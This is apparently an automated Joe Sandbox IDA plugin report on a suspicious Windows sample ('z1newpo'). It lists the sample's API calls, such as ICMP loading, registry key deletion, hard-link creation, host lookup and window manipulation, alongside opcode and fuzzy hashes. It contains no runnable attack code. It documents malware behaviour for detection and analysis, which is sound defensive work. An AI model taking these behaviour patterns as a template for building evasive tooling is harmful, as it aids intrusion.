                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$LabelVolume
                                                    • String ID: \VH
                                                    • API String ID: 2006950084-234962358
                                                    • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                    • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                    • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                    • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetMenuItemInfoW.USER32 ref: 00449727
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                    • DrawMenuBar.USER32 ref: 00449761
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                    • String ID: 0
                                                    • API String ID: 772068139-4108050209
                                                    • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                    • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                    • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                    • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcscpy
                                                    • String ID: 3, 3, 8, 1
                                                    • API String ID: 3469035223-357260408
                                                    • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                    • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                    • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                    • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                    • API String ID: 2574300362-3530519716
                                                    • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                    • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                    • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                    • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                    • API String ID: 2574300362-275556492
                                                    • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                    • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                    • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                    • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpSendEcho
• API String ID: 2574300362-58917771
• Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
• Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
• Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
• Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
• Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
• Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
• Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
• Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
• Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
• Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
APIs
• VariantInit.OLEAUT32(?), ref: 0047950F
• SysAllocString.OLEAUT32(00000000), ref: 004795D8
• VariantCopy.OLEAUT32(?,?), ref: 0047960F
• VariantClear.OLEAUT32(?), ref: 00479650
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
• Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
• Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
• Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
APIs
• SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
• __itow.LIBCMT ref: 004699CD
  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
• SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
• __itow.LIBCMT ref: 00469A97
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
• Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
• Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
• Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
APIs
• GetWindowRect.USER32(?,?), ref: 00449A4A
• ScreenToClient.USER32(?,?), ref: 00449A80
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
• Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
• Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
• Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
APIs
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
• Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
• Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
• Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
APIs
• ClientToScreen.USER32(00000000,?), ref: 0044169A
• GetWindowRect.USER32(?,?), ref: 00441722
• PtInRect.USER32(?,?,?), ref: 00441734
• MessageBeep.USER32(00000000), ref: 004417AD
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
• Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
• Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
• Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
• Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
• Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
• Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
• __isleadbyte_l.LIBCMT ref: 004208A6
• MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
• MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
• Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
• Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
• Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
APIs
• GetParent.USER32(?), ref: 004503C8
• DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
• DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
• DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
Similarity
• API ID: Proc$Parent
• String ID:
• API String ID: 2351499541-0
• Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
• Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
• Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
• Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
• TranslateMessage.USER32(?), ref: 00442B01
• DispatchMessageW.USER32(?), ref: 00442B0B
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchTranslate
                                                    • String ID:
                                                    • API String ID: 1795658109-0
                                                    • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                    • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                    • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                    • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                    • GetCaretPos.USER32(?), ref: 004743B2
                                                    • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                    • GetForegroundWindow.USER32 ref: 004743EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                    • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                    • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                    • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                    APIs
                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                    • _wcslen.LIBCMT ref: 00449519
                                                    • _wcslen.LIBCMT ref: 00449526
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_wcslen$_wcspbrk
                                                    • String ID:
                                                    • API String ID: 2886238975-0
                                                    • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                    • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                    • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                    • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __setmode$DebugOutputString_fprintf
                                                    • String ID:
                                                    • API String ID: 1792727568-0
                                                    • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                    • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                    • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                    • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                    APIs
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                    • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                    • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                    • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                    APIs
                                                      • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                      • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                      • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                    • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                    • String ID: cdecl
                                                    • API String ID: 3850814276-3896280584
                                                    • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                    • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                    • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                    • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                    APIs
                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                    • _memmove.LIBCMT ref: 0046D475
                                                    • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 2502553879-0
                                                    • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
